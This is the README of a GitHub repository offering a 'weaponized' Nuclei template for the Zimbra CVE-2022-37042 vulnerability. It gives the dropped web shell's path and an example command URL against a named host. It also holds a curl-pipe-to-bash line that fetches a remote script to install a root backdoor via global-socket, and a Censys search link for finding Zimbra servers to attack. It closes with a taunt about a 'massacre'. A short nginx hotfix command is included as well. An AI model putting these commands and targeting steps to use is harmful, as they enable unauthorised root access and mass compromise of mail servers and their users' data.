Skip to content

aels/CVE-2022-37042

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

20 Commits
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2022-37042

image

Zimbra CVE-2022-37042 Nuclei weaponized template

shell path: /public/formatter.jsp

Nuclei itself: https://github.com/projectdiscovery/nuclei

shell have hidden input with 0 opacity, so just hover mouse over it, type command, then press [Enter] key:

image

example shell url:

https://ms1.fission.com:8443/public/formatter.jsp?cmd=id

CVE-2022-37042 hotfix to patch owned servers

issue this command (but only once):

cd /opt/zimbra/conf/nginx/templates/; sed -i 's|location ~\* \^/zmerror_|location = /service/extension/backup/mboximport { return 403; }\n    location ~\* \^/zmerror_|' nginx.conf.web.http*; /opt/zimbra/bin/zmproxyctl restart;

need additional code to servers with not Nginx but Apache. Pull requests are wellcome.

Zimbra autoroot via zimbslap

curl -fskSL raw.githubusercontent.com/aels/zimbra-slapper/main/slapper.sh | bash 2>&1

this command will install global-socket (https://www.gsocket.io/deploy/) and pass you the key to connect as root.

get zimbra ips

https://search.censys.io/search?resource=hosts&sort=RELEVANCE&per_page=100&virtual_hosts=EXCLUDE&q=services.http.response.html_tags%3A+%22%3Ctitle%3EZimbra+Web+Client+Sign+In%22

happy birthday massacre, motherfuckers ;)

About

Zimbra CVE-2022-37042 Nuclei weaponized template

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages